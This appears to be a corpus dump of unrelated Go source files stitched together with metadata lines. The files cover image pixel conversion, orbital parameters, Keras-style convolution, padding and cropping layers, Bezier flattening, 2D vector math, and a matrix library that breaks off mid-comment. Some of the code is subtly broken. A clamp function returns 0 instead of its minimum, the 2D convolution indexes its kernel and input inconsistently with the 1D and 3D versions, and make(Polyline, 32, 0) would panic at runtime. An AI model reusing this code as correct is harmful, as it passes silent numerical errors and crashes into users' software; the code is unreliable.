return pixelFromColor(p.image.At(x, y))
}
func (p *pixelGetter) getPixelRow(y int, buf *[]pixel) {
*buf = (*buf)[:0]
for x := p.bounds.Min.X; x != p.bounds.Max.X; x++ {
*buf = append(*buf, p.getPixel(x, y))
}
}
func (p *pixelGetter) getPixelColumn(x int, buf *[]pixel) {
*buf = (*buf)[:0]
for y := p.bounds.Min.Y; y != p.bounds.Max.Y; y++ {
*buf = append(*buf, p.getPixel(x, y))
}
}
func f32u8(val float32) uint8 {
x := int64(val + 0.5)
if x > 0xff {
return 0xff
}
if x > 0 {
return uint8(x)
}
return 0
}
func f32u16(val float32) uint16 {
x := int64(val + 0.5)
if x > 0xffff {
return 0xffff
}
if x > 0 {
return uint16(x)
}
return 0
}
func clampi32(val, min, max int32) int32 {
if val > max {
return max
}
if val > min {
return val
}
return 0
}
type pixelSetter struct {
it imageType
bounds image.Rectangle
image draw.Image
nrgba *image.NRGBA
nrgba64 *image.NRGBA64
rgba *image.RGBA
rgba64 *image.RGBA64
gray *image.Gray
gray16 *image.Gray16
paletted *image.Paletted
palette []pixel
}
func newPixelSetter(img draw.Image) *pixelSetter {
switch img := img.(type) {
case *image.NRGBA:
return &pixelSetter{
it: itNRGBA,
bounds: img.Bounds(),
nrgba: img,
}
case *image.NRGBA64:
return &pixelSetter{
it: itNRGBA64,
bounds: img.Bounds(),
nrgba64: img,
}
case *image.RGBA:
return &pixelSetter{
it: itRGBA,
bounds: img.Bounds(),
rgba: img,
}
case *image.RGBA64:
return &pixelSetter{
it: itRGBA64,
bounds: img.Bounds(),
rgba64: img,
}
case *image.Gray:
return &pixelSetter{
it: itGray,
bounds: img.Bounds(),
gray: img,
}
case *image.Gray16:
return &pixelSetter{
it: itGray16,
bounds: img.Bounds(),
gray16: img,
}
case *image.Paletted:
return &pixelSetter{
it: itPaletted,
bounds: img.Bounds(),
paletted: img,
palette: convertPalette(img.Palette),
}
default:
return &pixelSetter{
it: itGeneric,
bounds: img.Bounds(),
image: img,
}
}
}
func (p *pixelSetter) setPixel(x, y int, px pixel) {
if !image.Pt(x, y).In(p.bounds) {
return
}
switch p.it {
case itNRGBA:
i := p.nrgba.PixOffset(x, y)
p.nrgba.Pix[i+0] = f32u8(px.r * 0xff)
p.nrgba.Pix[i+1] = f32u8(px.g * 0xff)
p.nrgba.Pix[i+2] = f32u8(px.b * 0xff)
p.nrgba.Pix[i+3] = f32u8(px.a * 0xff)
case itNRGBA64:
r16 := f32u16(px.r * 0xffff)
g16 := f32u16(px.g * 0xffff)
b16 := f32u16(px.b * 0xffff)
a16 := f32u16(px.a * 0xffff)
i := p.nrgba64.PixOffset(x, y)
p.nrgba64.Pix[i+0] = uint8(r16 >> 8)
p.nrgba64.Pix[i+1] = uint8(r16 & 0xff)
p.nrgba64.Pix[i+2] = uint8(g16 >> 8)
p.nrgba64.Pix[i+3] = uint8(g16 & 0xff)
p.nrgba64.Pix[i+4] = uint8(b16 >> 8)
p.nrgba64.Pix[i+5] = uint8(b16 & 0xff)
p.nrgba64.Pix[i+6] = uint8(a16 >> 8)
p.nrgba64.Pix[i+7] = uint8(a16 & 0xff)
case itRGBA:
fa := px.a * 0xff
i := p.rgba.PixOffset(x, y)
p.rgba.Pix[i+0] = f32u8(px.r * fa)
p.rgba.Pix[i+1] = f32u8(px.g * fa)
p.rgba.Pix[i+2] = f32u8(px.b * fa)
p.rgba.Pix[i+3] = f32u8(fa)
case itRGBA64:
fa := px.a * 0xffff
r16 := f32u16(px.r * fa)
g16 := f32u16(px.g * fa)
b16 := f32u16(px.b * fa)
a16 := f32u16(fa)
i := p.rgba64.PixOffset(x, y)
p.rgba64.Pix[i+0] = uint8(r16 >> 8)
p.rgba64.Pix[i+1] = uint8(r16 & 0xff)
p.rgba64.Pix[i+2] = uint8(g16 >> 8)
p.rgba64.Pix[i+3] = uint8(g16 & 0xff)
p.rgba64.Pix[i+4] = uint8(b16 >> 8)
p.rgba64.Pix[i+5] = uint8(b16 & 0xff)
p.rgba64.Pix[i+6] = uint8(a16 >> 8)
p.rgba64.Pix[i+7] = uint8(a16 & 0xff)
case itGray:
i := p.gray.PixOffset(x, y)
p.gray.Pix[i] = f32u8((0.299*px.r + 0.587*px.g + 0.114*px.b) * px.a * 0xff)
case itGray16:
i := p.gray16.PixOffset(x, y)
y16 := f32u16((0.299*px.r + 0.587*px.g + 0.114*px.b) * px.a * 0xffff)
p.gray16.Pix[i+0] = uint8(y16 >> 8)
p.gray16.Pix[i+1] = uint8(y16 & 0xff)
case itPaletted:
px1 := pixel{
minf32(maxf32(px.r, 0), 1),
minf32(maxf32(px.g, 0), 1),
minf32(maxf32(px.b, 0), 1),
minf32(maxf32(px.a, 0), 1),
}
i := p.paletted.PixOffset(x, y)
k := getPaletteIndex(p.palette, px1)
p.paletted.Pix[i] = uint8(k)
case itGeneric:
r16 := f32u16(px.r * 0xffff)
g16 := f32u16(px.g * 0xffff)
b16 := f32u16(px.b * 0xffff)
a16 := f32u16(px.a * 0xffff)
p.image.Set(x, y, color.NRGBA64{r16, g16, b16, a16})
}
}
func (p *pixelSetter) setPixelRow(y int, buf []pixel) {
for i, x := 0, p.bounds.Min.X; i < len(buf); i, x = i+1, x+1 {
p.setPixel(x, y, buf[i])
}
}
func (p *pixelSetter) setPixelColumn(x int, buf []pixel) {
for i, y := 0, p.bounds.Min.Y; i < len(buf); i, y = i+1, y+1 {
p.setPixel(x, y, buf[i])
}
} | vendor/github.com/disintegration/gift/pixels.go | 0.611614 | 0.459197 | pixels.go | starcoder |
package orbit
import (
"fmt"
)
type OrbitParameter struct {
MU *float64 // G*M earth MU
CentralBodyRadius *float64 // // earth radius
// Apogee defines furthest point to the central body
Apogee *float64 // km
// Perigee defines closest point to the central body
Perigee *float64 // km
// SemimajorAxis is the sum of the periapsis and apoapsis distances divided by two.
// For circular orbits, the semimajor axis is the distance between the centers of the bodies, not the distance of the bodies from the center of mass.
SemimajorAxis *float64
SemilatusRectum *float64
// Eccentricity determines the amount by which its orbit around another body deviates from a perfect circle.
// A value of 0 is a circular orbit, values between 0 and 1 form an elliptic orbit, 1 is a parabolic escape orbit, and greater than 1 is a hyperbola.
Eccentricity *float64
// Inclination determines the vertical tilt of the ellipse with respect to the reference plane, measured at the ascending node
Inclination *float64 // deg
// ArgumentOfPeriapsis defines the orientation of the ellipse in the orbital plane, as an angle measured from the ascending node to the periapsis
ArgumentOfPeriapsis *float64 // deg
// RightAscension horizontally orients the ascending node of the ellipse with respect to the reference frame's vernal point
RightAscension *float64 // deg
// TrueAnomaly defines the position of the orbiting body along the ellipse at a specific time (epoch)
TrueAnomaly *float64 // deg
AngularMomentum *float64
}
func (p *OrbitParameter) String() string {
s := fmt.Sprintf(" MU: %f\n", *p.MU)
s = fmt.Sprintf("%s CentralBodyRadius: %f\n", s, *p.CentralBodyRadius)
s = fmt.Sprintf("%s Apogee: %v\n", s, p.Apogee)
s = fmt.Sprintf("%s Perigee: %v\n", s, p.Perigee)
s = fmt.Sprintf("%s SemimajorAxis: %v\n", s, *p.SemimajorAxis)
s = fmt.Sprintf("%s SemilatusRectum: %f\n", s, *p.SemilatusRectum)
s = fmt.Sprintf("%s Eccentricity: %f\n", s, *p.Eccentricity)
s = fmt.Sprintf("%s Inclination: %f\n", s, *p.Inclination)
s = fmt.Sprintf("%s ArgumentOfPeriapsis: %f\n", s, *p.ArgumentOfPeriapsis)
s = fmt.Sprintf("%s RightAscension: %f\n", s, *p.RightAscension)
s = fmt.Sprintf("%s TrueAnomaly: %f\n", s, *p.TrueAnomaly)
s = fmt.Sprintf("%s AngularMomentum: %v\n", s, *p.AngularMomentum)
return s
}
func extendParams(params *OrbitParameter) *OrbitParameter {
params = baseParams(params)
if params.Apogee != nil && params.Perigee != nil {
semimajorAxis := semimajorAxisFromApogeeAndPerigee(*params.Apogee, *params.Perigee, *params.CentralBodyRadius)
eccentricity := eccentricityFromSemimajorAxisAndPerigee(semimajorAxis, *params.Perigee, *params.CentralBodyRadius)
params.SemimajorAxis = &semimajorAxis
params.Eccentricity = &eccentricity
} else if params.SemilatusRectum != nil {
semimajorAxis := semimajorAxisFromSemilatusRectumAndEccentricity(*params.SemilatusRectum, *params.Eccentricity)
params.SemimajorAxis = &semimajorAxis
}
if params.SemilatusRectum == nil {
semilatusRectum := semilatusRectumFromSemimajorAxisAndEccentricity(*params.SemimajorAxis, *params.Eccentricity)
params.SemilatusRectum = &semilatusRectum
}
angularMomentum := angularMomentumFromSemilatusRectum(*params.SemilatusRectum, *params.MU)
params.AngularMomentum = &angularMomentum
return params
}
func baseParams(params *OrbitParameter) *OrbitParameter {
zero := 0.0
if params.Inclination == nil {
params.Inclination = &zero
}
if params.ArgumentOfPeriapsis == nil {
params.ArgumentOfPeriapsis = &zero
}
if params.RightAscension == nil {
params.RightAscension = &zero
}
if params.TrueAnomaly == nil {
params.TrueAnomaly = &zero
}
if params.Eccentricity == nil {
params.Eccentricity = &zero
}
return params
} | server/mathf/orbit/orbit-parameter.go | 0.747984 | 0.627552 | orbit-parameter.go | starcoder |
package keras2go
import "math"
/**
* 1D (temporal) Padding.
*
* :param output: tensor to store padded output data.
* :param input: tensor to pad.
* :param fill: value to fill in padded areas.
* :param pad: Array[2] of how many rows to pad. Order is {before dim 1, after dim 1}.
*/
func k2c_pad1d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
in_width := input.Shape[1]
pad_top := pad[0]
output.fillFloat64(fill)
offset := pad_top * in_width
copy(output.Array[offset:], input.Array[:input.Numel])
}
func (this *K2c_tensor) fillFloat64(fill float64) {
if math.Abs(fill) < 1e-6 {
for idx := 0; idx < this.Numel; idx++ {
this.Array[idx] = 0
}
} else {
for idx := 0; idx < this.Numel; idx++ {
this.Array[idx] = fill
}
}
}
/**
* 2D (spatial) Padding.
*
* :param output: tensor to store padded output data.
* :param input: tensor to pad.
* :param fill: value to fill in padded areas.
* :param pad: Array[4] of how many rows/cols to pad. Order is {before dim 1, after dim 1, before dim 2, after dim 2}.
*/
func k2c_pad2d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
in_height := input.Shape[0]
in_width := input.Shape[1]
in_channels := input.Shape[2]
pad_top := pad[0]
pad_left := pad[2]
pad_right := pad[3]
output.fillFloat64(fill)
offset := in_channels*(pad_left+pad_right+in_width)*pad_top + in_channels*pad_left
num := in_channels * in_width
step := num + in_channels*(pad_left+pad_right)
for idx := 0; idx < in_height; idx++ {
copy(output.Array[offset:], input.Array[idx*num:idx*num+num])
offset += step
}
}
/**
* 3D (spatial or spatio-temporal) Padding.
*
* :param output: tensor to store padded output data.
* :param input: tensor to pad.
* :param fill: value to fill in padded areas.
* :param pad: Array[6] of how many rows/cols to pad. Order is {before dim 1, after dim 1, before dim 2, after dim 2, before dim 3, after dim 3}.
*/
func k2c_pad3d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
dim1 := input.Shape[0]
dim2 := input.Shape[1]
dim3 := input.Shape[2]
//outdim1 := dim1 + pad[0] + pad[1]
outdim2 := dim2 + pad[2] + pad[3]
outdim3 := dim3 + pad[4] + pad[5]
in_channels := input.Shape[3]
output.fillFloat64(fill)
offset1 := in_channels*(outdim2*outdim3)*pad[0] + in_channels*outdim3*pad[2] + in_channels*pad[4]
num := in_channels * dim3
outstep2 := num + in_channels*(pad[4]+pad[5])
outstep1 := outdim2 * outdim3 * in_channels
instep1 := dim2 * dim3 * in_channels
instep2 := dim3 * in_channels
for i := 0; i < dim1; i++ {
for j := 0; j < dim2; j++ {
inIdx := i*instep1 + j*instep2
copy(output.Array[offset1+i*outstep1+j*outstep2:], input.Array[inIdx:inIdx+num])
}
}
}
/**
* 1D (temporal) Convolution.
* Assumes a "channels last" structure.
*
* :param output: output tensor.
* :param input: input tensor.
* :param kernel: kernel tensor.
* :param bias: bias tensor.
* :param stride: stride length of the convolution.
* :param dilation: dilation rate to use for dilated convolution.
* :param activation: activation function to apply to output.
*/
func k2c_conv1d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride int, dilation int, activation k2c_activationType) {
output.fillFloat64(0)
out_times := output.Shape[0]
out_channels := output.Shape[1]
in_channels := input.Shape[1]
for x0 := 0; x0 < out_times; x0++ {
for z := 0; z < kernel.Shape[0]; z++ {
for q := 0; q < in_channels; q++ {
for k := 0; k < out_channels; k++ {
output.Array[x0*out_channels+k] += kernel.Array[z*(kernel.Shape[2]*kernel.Shape[1])+q*(kernel.Shape[2])+k] * input.Array[(x0*stride+dilation*z)*in_channels+q]
}
}
}
}
k2c_bias_add(output, bias)
activation(output.Array[:output.Numel])
}
/**
* 2D (spatial) Convolution.
* Assumes a "channels last" structure.
*
* :param output: output tensor.
* :param input: input tensor.
* :param kernel: kernel tensor.
* :param bias: bias tensor.
* :param stride: Array[2] of stride length of the convolution. Order is {stride dim 1, stride dim 2}.
* :param dilation: Array[2] dilation rate to use for dilated convolution. Order is {dilation dim 1, dilation dim 2}.
* :param activation: activation function to apply to output.
*/
func k2c_conv2d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride []int, dilation []int, activation k2c_activationType) {
output.fillFloat64(0)
out_rows := output.Shape[0]
out_cols := output.Shape[1]
out_channels := output.Shape[2]
in_channels := input.Shape[2]
for x0 := 0; x0 < out_rows; x0++ {
for x1 := 0; x1 < out_cols; x1++ {
for z0 := 0; z0 < kernel.Shape[0]; z0++ {
for z1 := 0; z1 < kernel.Shape[1]; z1++ {
for q := 0; q < in_channels; q++ {
for k := 0; k < out_channels; k++ {
output.Array[x0*(output.Shape[2]*output.Shape[1])+
x1*(output.Shape[2])+k] +=
kernel.Array[z0*(kernel.Shape[3]*kernel.Shape[2]*kernel.Shape[1])+
z1*(kernel.Shape[3]*kernel.Shape[2])+
q*(kernel.Shape[3]+k)] *
input.Array[(x0+stride[0]+dilation[0]*z0)*
(input.Shape[2]*input.Shape[1])+
(x1*stride[1]+dilation[1]*z1)*(input.Shape[2])+q]
}
}
}
}
}
}
k2c_bias_add(output, bias)
activation(output.Array[:output.Numel])
}
/**
* 3D (spatial or spatio-temporal) Convolution.
* Assumes a "channels last" structure.
*
* :param output: output tensor.
* :param input: input tensor.
* :param kernel: kernel tensor.
* :param bias: bias tensor.
* :param stride: Array[3] of stride length of the convolution. Order is {stride dim 1, stride dim 2, stride dim 3}.
* :param dilation: Array[3] dilation rate to use for dilated convolution. Order is {dilation dim 1, dilation dim 2, dilation dim 3}.
* :param activation: activation function to apply to output.
*/
func k2c_conv3d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride []int, dilation []int, activation k2c_activationType) {
output.fillFloat64(0)
dim1 := output.Shape[0]
dim2 := output.Shape[1]
dim3 := output.Shape[2]
out_channels := output.Shape[3]
in_channels := input.Shape[3]
for x0 := 0; x0 < dim1; x0++ {
for x1 := 0; x1 < dim2; x1++ {
for x2 := 0; x2 < dim3; x2++ {
for z0 := 0; z0 < kernel.Shape[0]; z0++ {
for z1 := 0; z1 < kernel.Shape[1]; z1++ {
for z2 := 0; z2 < kernel.Shape[2]; z2++ {
for q := 0; q < in_channels; q++ {
for k := 0; k < out_channels; k++ {
output.Array[x0*(output.Shape[3]*output.Shape[2]*
output.Shape[1])+
x1*(output.Shape[3]*output.Shape[2])+
x2*(output.Shape[3])+k] +=
kernel.Array[z0*(kernel.Shape[4]*kernel.Shape[3]*kernel.Shape[2]*kernel.Shape[1])+
z1*(kernel.Shape[4]*kernel.Shape[3]*kernel.Shape[2])+
z2*(kernel.Shape[4]*kernel.Shape[3])+
q*(kernel.Shape[4])+k] *
input.Array[(x0*stride[0]+dilation[0]*z0)*
(input.Shape[3]*input.Shape[2]*input.Shape[1])+
(x1*stride[1]+dilation[1]*z1)*(input.Shape[3]*input.Shape[2])+
(x2*stride[2]+dilation[2]*z2)*(input.Shape[3])+q]
}
}
}
}
}
}
}
}
k2c_bias_add(output, bias)
activation(output.Array[:output.Numel])
}
/**
* 1D (temporal) Cropping.
*
* :param output: tensor to store cropped output data.
* :param input: tensor to crop.
* :param pad: Array[2] of how many rows to crop. Order is {before dim 1, after dim 1}.
*/
func k2c_crop1d(output *K2c_tensor, input *K2c_tensor, crop []int) {
offset := crop[0] * input.Shape[1]
copy(output.Array, input.Array[offset:offset+output.Numel])
}
/**
* 2D (spatial) Cropping.
*
* :param output: tensor to store cropped output data.
* :param input: tensor to crop.
* :param pad: Array[4] of how many rows/cols to crop. Order is {before dim 1, after dim 1, before dim 2, after dim 2}.
*/
func k2c_crop2d(output *K2c_tensor, input *K2c_tensor, crop []int) {
var out_height = output.Shape[0]
var in_width = input.Shape[1]
var in_channels = input.Shape[2]
var crop_top = crop[0]
var crop_left = crop[2]
var crop_right = crop[3]
var offset = in_channels*in_width*crop_top + in_channels*crop_left
var num = in_channels * (in_width - crop_left - crop_right)
for i := 0; i < out_height; i++ {
copy(output.Array[i*num:], input.Array[offset:offset+num])
offset += in_width * in_channels
}
}
/**
* 3D (spatial or spatio-temporal) Cropping.
*
* :param output: tensor to store cropped output data.
* :param input: tensor to crop.
* :param pad: Array[6] of how many rows/cols to crop. Order is {before dim 1, after dim 1, before dim 2, after dim 2, before dim 3, after dim 3}.
*/
func k2c_crop3d(output *K2c_tensor, input *K2c_tensor, crop []int) {
var dim1 = input.Shape[0]
var dim2 = input.Shape[1]
var dim3 = input.Shape[2]
var outdim1 = dim1 - crop[0] - crop[1]
var outdim2 = dim2 - crop[2] - crop[3]
var outdim3 = dim3 - crop[4] - crop[5]
var in_channels = input.Shape[3]
var offset1 = in_channels*(dim2*dim3)*crop[0] + in_channels*dim3*crop[2] + in_channels*crop[4]
var num = in_channels * outdim3
var instep2 = num + in_channels*(crop[4]+crop[5])
var instep1 = dim2 * dim3 * in_channels
var outstep1 = outdim2 * outdim3 * in_channels
var outstep2 = outdim3 * in_channels
for i := 0; i < outdim1; i++ {
for j := 0; j < outdim2; j++ {
inIdx := offset1 + i*instep1 + j*instep2
copy(output.Array[i*outstep1+j*outstep2:], input.Array[inIdx:inIdx+num])
}
}
}
/**
* 1D (temporal) Upsampling.
* Repeats each temporal step size times along the time axis.
*
* :param output: output tensor.
* :param input: input tensor.
* :param size: Upsampling factor.
*/
func k2c_upsampling1d(output *K2c_tensor, input *K2c_tensor, size int) {
var in_height = input.Shape[0]
var in_width = input.Shape[1]
for i := 0; i < in_height; i++ {
for j := 0; j < size; j++ {
for k := 0; k < in_width; k++ {
output.Array[(size*i+j)*in_width+k] = input.Array[i*in_width+k]
}
}
}
}
/**
* 2D (spatial) Upsampling.
* Repeats the rows and columns of the data by size[0] and size[1] respectively.
*
* :param output: output tensor.
* :param input: input tensor.
* :param size: Array[2] of upsampling factors. Order is {upsampling dim 1, upsampling dim 2}.
*/
func k2c_upsampling2d(output *K2c_tensor, input *K2c_tensor, size []int) {
var out_height = output.Shape[0]
var out_width = output.Shape[1]
var channels = output.Shape[2]
for i := 0; i < out_height; i++ {
for j := 0; j < out_width; j++ {
var insub = [K2C_MAX_NDIM]int{i / size[0], j / size[1], 0}
var outsub = [K2C_MAX_NDIM]int{i, j, 0}
inIdx := k2c_sub2idx(insub[:], input.Shape[:], input.Ndim)
copy(output.Array[k2c_sub2idx(outsub[:], output.Shape[:], output.Ndim):], input.Array[inIdx:inIdx+channels])
}
}
}
/**
* 2D (spatial) Upsampling.
* Repeats the 1st, 2nd and 3rd dimensions of the data by size[0], size[1] and size[2] respectively.
*
* :param output: output tensor.
* :param input: input tensor.
* :param size: Array[3] of upsampling factors. Order is {upsampling dim 1, upsampling dim 2, upsampling dim 3}.
*/
func k2c_upsampling3d(output *K2c_tensor, input *K2c_tensor, size []int) {
var dim1 = output.Shape[0]
var dim2 = output.Shape[1]
var dim3 = output.Shape[2]
var channels = input.Shape[3]
for i := 0; i < dim1; i++ {
for j := 0; j < dim2; j++ {
for k := 0; k < dim3; k++ {
var insub = [K2C_MAX_NDIM]int{i / size[0], j / size[1], k / size[2], 0}
var outsub = [K2C_MAX_NDIM]int{i, j, k, 0}
inIdx := k2c_sub2idx(insub[:], input.Shape[:], input.Ndim)
copy(output.Array[k2c_sub2idx(outsub[:], output.Shape[:], output.Ndim):], input.Array[inIdx:inIdx+channels])
}
}
}
} | convolution_layers.go | 0.862439 | 0.70864 | convolution_layers.go | starcoder |
package geometry
import (
"math"
)
const (
curveRecursionLimit = 32
)
// Bezier cubic curve defined by 2 control points
// the first and last point defined respectivly the start and the end of the curve
type CubicCurve [4]Vector
// Subdivide the curve into 2 CubicCurve that is equivalent
func (c CubicCurve) Subdivide() (c1, c2 CubicCurve) {
// Calculate all the mid-points of the line segments
//----------------------
c1[0] = c[0]
c2[3] = c[3]
p := c[1].Center(c[2])
c1[1] = c[0].Center(c[1])
c2[2] = c[2].Center(c[3])
c1[2] = c1[1].Center(p)
c2[1] = c2[2].Center(p)
c1[3] = c1[2].Center(c2[1])
c2[0] = c1[3]
return
}
// Flatten Curve into a Polyline
// flatteningThreshold is used to stop subdivision of curve. Give good result with the value 0.25
// see http://www.antigrain.com/research/adaptive_bezier/index.html
func (curve CubicCurve) ToPolyline(flatteningThreshold float64) Polyline {
var curves [curveRecursionLimit]CubicCurve
curves[0] = curve
i := 0
// current curve
var c CubicCurve
p := make(Polyline, 32, 0)
for i >= 0 {
c = curves[i]
d := c[3].Sub(c[0])
dn := d.Normal()
d2 := math.Abs(c[1].Sub(c[3]).Dot(dn)) + math.Abs(c[2].Sub(c[3]).Dot(dn))
if d2*d2 < flatteningThreshold*d.LengthSquare() || i == len(curves)-1 {
p = append(p, c[3])
i--
} else {
// second half of bezier go lower onto the stack
curves[i+1], curves[i] = c.Subdivide()
i++
}
}
return p
}
// Bezier quadratic curve defined by 1 control point
// the first and last point defined respectivly the start and the end of the curve
type QuadCurve [3]Vector
// Subdivide the curve into 2 QuadCurve that is equivalent
func (c QuadCurve) Subdivide() (c1, c2 QuadCurve) {
// Calculate all the mid-points of the line segments
//----------------------
c1[0] = c[0]
c2[2] = c[2]
c1[1] = c[0].Center(c[1])
c2[1] = c[1].Center(c[2])
c1[2] = c1[1].Center(c2[1])
c2[0] = c1[2]
return
}
// Flatten Curve into a Polyline
// The parameter is used (curvy tolerance) to know when to stop the flatenning process
func (curve QuadCurve) ToPolyline(flattening_threshold float64) Polyline {
var curves [curveRecursionLimit]QuadCurve
curves[0] = curve
i := 0
// current curve
var c QuadCurve
var dx, dy, d float64
p := make(Polyline, curveRecursionLimit, 0)
for i >= 0 {
c = curves[i]
dx = c[2].X - c[0].X
dy = c[2].Y - c[0].Y
d = math.Abs((c[1].X-c[2].X)*dy - (c[1].Y-c[2].Y)*dx)
if (d*d) < flattening_threshold*(dx*dx+dy*dy) || i == len(curves)-1 {
p = append(p, c[2])
i--
} else {
// second half of bezier go lower onto the stack
curves[i+1], curves[i] = c.Subdivide()
i++
}
}
return p
} | geometry/curve.go | 0.758153 | 0.526099 | curve.go | starcoder |
package vecmath
import (
"fmt"
"math"
"github.com/etic4/vecmath/maths"
)
//Vec2 Représente un vecteur 2D
type Vec2 struct {
X float64
Y float64
}
//NewVector crée un nouveau vecteur
func NewVector(x, y float64) Vec2 {
return Vec2{x, y}
}
//FromPolar retourne un vecteur à partir de coordonées polaires
// param angle: angle en radians
// param length: longueur
func FromPolar(angle float64, length float64) Vec2 {
x := math.Cos(angle) * length
y := -math.Sin(angle) * length // y = 0 en haut à gauche
return NewVector(x, y)
}
//Clone retourne une copie du vecteur
//Comme le vecteur est passé par valeur, 'v' est déjà une copie
func (v Vec2) Clone() Vec2 {
return v
}
//Equals vérifie si les deux vecteur sont égaux
func (v Vec2) Equals(other Vec2) bool {
return v.X == other.X && v.Y == other.Y
}
//Angle retourne l'angle en radians entre ce vecteur
// et l'axe des x
func (v Vec2) Angle() float64 {
angle := math.Atan2(v.Y, v.X)
if angle < 0 {
angle += 2 * math.Pi
}
return -angle //négatif à cause de la direction de y
}
//Add additionne deux vecteurs
func (v Vec2) Add(v2 Vec2) Vec2 {
return Vec2{v.X + v2.X, v.Y + v2.Y}
}
//AddScalar ajoute 's' à chaque composante
func (v Vec2) AddScalar(s float64) Vec2 {
return Vec2{v.X + s, v.Y + s}
}
//Sub soustrait deux vecteurs
func (v Vec2) Sub(v2 Vec2) Vec2 {
return Vec2{v.X - v2.X, v.Y - v2.Y}
}
//SubScalar soustrait s à chaque composante
func (v Vec2) SubScalar(s float64) Vec2 {
return Vec2{v.X - s, v.Y - s}
}
//DotProduct produit scalaire de deux vecteurs
func (v Vec2) DotProduct(v2 Vec2) float64 {
return v.X*v2.X + v.Y*v2.Y
}
//Mult multiplie le vecteur par un scalaire
func (v Vec2) Mult(s float64) Vec2 {
return Vec2{v.X * s, v.Y * s}
}
//Div divise le vecteur par un scalaire
func (v Vec2) Div(s float64) Vec2 {
return Vec2{v.X / s, v.Y / s}
}
//Neg négation d'un vecteur (180°)
func (v Vec2) Neg() Vec2 {
return Vec2{-1 * v.X, -1 * v.Y}
}
//Length norme du vecteur
func (v Vec2) Length() float64 {
return math.Sqrt(v.DotProduct(v))
}
//Normalize retourne vecteur unitaire (normalisé)
func (v Vec2) Normalize() Vec2 {
length := v.Length()
if length == 0 {
return v
}
return v.Div(length)
}
//Distance distance entre deux vecteurs
func (v Vec2) Distance(v2 Vec2) float64 {
return v2.Sub(v).Length()
}
//DistanceSq pour la facilité
func (v Vec2) DistanceSq(v2 Vec2) float64 {
dx := v2.X - v.X
dy := v2.Y - v.Y
return dx*dx + dy*dy
}
//SetMag Définit la taille du vecteur
func (v Vec2) SetMag(lenght float64) Vec2 {
v = v.Normalize()
return v.Mult(lenght)
}
//Lerp interpolation linéaire entre ce vecteur et l'autre
func (v Vec2) Lerp(other Vec2, t float64) Vec2 {
nwX := v.X + t*(other.X-v.X)
nwY := v.Y + t*(other.Y-v.Y)
return Vec2{X: nwX, Y: nwY}
}
//ZERO vecteur (0, 0)
func ZERO() Vec2 {
return NewVector(0, 0)
}
//UP vecteur (0, -1)
func UP() Vec2 {
return NewVector(0, -1)
}
//DOWN vecteur (0, 1)
func DOWN() Vec2 {
return NewVector(0, 1)
}
//LEFT vecteur (-1, 0)
func LEFT() Vec2 {
return NewVector(-1, 0)
}
//RIGHT vecteur (1, 0)
func RIGHT() Vec2 {
return NewVector(1, 0)
}
//Round arrondis les deux composantes du vecteur à la nième decimale
func (v Vec2) Round(decimals int) Vec2 {
prop := math.Pow10(decimals)
return Vec2{math.Round(v.X*prop) / prop, math.Round(v.Y*prop) / prop}
}
//LimitMag limite la longueur du vecteur
func (v Vec2) LimitMag(min float64, max float64) Vec2 {
clamped := maths.Clamp(v.Length(), min, max)
return v.SetMag(clamped)
}
//String Retourne imprimable
func (v Vec2) String() string {
return fmt.Sprintf("%v,%v", v.X, v.Y)
} | vecmath.go | 0.748904 | 0.713881 | vecmath.go | starcoder |
package gofa
// Vector/Matrix Library
// 1. Initialization (4)
// Operations involving p-vectors and r-matrices (3)
/*
Zp Zero a p-vector.
Returned:
p [3]float64 zero p-vector
*/
func Zp(p *[3]float64) {
p[0] = 0.0
p[1] = 0.0
p[2] = 0.0
}
/*
Zr Initialize an r-matrix to the null matrix.
Returned:
r [3][3]float64 r-matrix
*/
func Zr(r *[3][3]float64) {
r[0][0] = 0.0
r[0][1] = 0.0
r[0][2] = 0.0
r[1][0] = 0.0
r[1][1] = 0.0
r[1][2] = 0.0
r[2][0] = 0.0
r[2][1] = 0.0
r[2][2] = 0.0
}
/*
Ir Initialize an r-matrix to the identity matrix.
Returned:
r [3][3]float64 r-matrix
*/
func Ir(r *[3][3]float64) {
r[0][0] = 1.0
r[0][1] = 0.0
r[0][2] = 0.0
r[1][0] = 0.0
r[1][1] = 1.0
r[1][2] = 0.0
r[2][0] = 0.0
r[2][1] = 0.0
r[2][2] = 1.0
}
/*
Zpv Zero a pv-vector.
Returned:
pv [2][3]float64 zero pv-vector
Called:
Zp zero p-vector
*/
func Zpv(pv *[2][3]float64) {
Zp(&pv[0])
Zp(&pv[1])
}
// 2. Copy/Extend/Extract (5)
// Operations involving p-vectors and r-matrices (2)
/*
Cp Copy a p-vector.
Given:
p [3]float64 p-vector to be copied
Returned:
c [3]float64 copy
*/
func Cp(p [3]float64, c *[3]float64) {
c[0] = p[0]
c[1] = p[1]
c[2] = p[2]
}
/*
Cr Copy an r-matrix.
Given:
r [3][3]float64 r-matrix to be copied
Returned:
c [3][3]float64 copy
Called:
Cp copy p-vector
*/
func Cr(r [3][3]float64, c *[3][3]float64) {
Cp(r[0], &c[0])
Cp(r[1], &c[1])
Cp(r[2], &c[2])
}
// Operations involving pv-vectors (3)
/*
Cpv Copy a position/velocity vector.
Given:
pv [2][3]float64 position/velocity vector to be copied
Returned:
c [2][3]float64 copy
*/
func Cpv(pv [2][3]float64, c *[2][3]float64) {
Cp(pv[0], &c[0])
Cp(pv[1], &c[1])
}
/*
P2pv Extend a p-vector to a pv-vector by appending a zero velocity.
Given:
p [3]float64 p-vector
Returned:
pv [2][3]float64 pv-vector
Called:
Cp copy p-vector
Zp zero p-vector
*/
func P2pv(p [3]float64, pv *[2][3]float64) {
Cp(p, &pv[0])
Zp(&pv[1])
}
/*
Pv2p Discard velocity component of a pv-vector.
Given:
pv [2][3]float64 pv-vector
Returned:
p [3]float64 p-vector
Called:
Cp copy p-vector
*/
func Pv2p(pv [2][3]float64, p *[3]float64) {
Cp(pv[0], p)
}
// 3. Build Rotations (3)
/*
Rx Rotate an r-matrix about the x-axis.
Given:
phi float64 angle (radians)
Given and returned:
r [3][3]float64 r-matrix, rotated
Notes:
1) Calling this function with positive phi incorporates in the
supplied r-matrix r an additional rotation, about the x-axis,
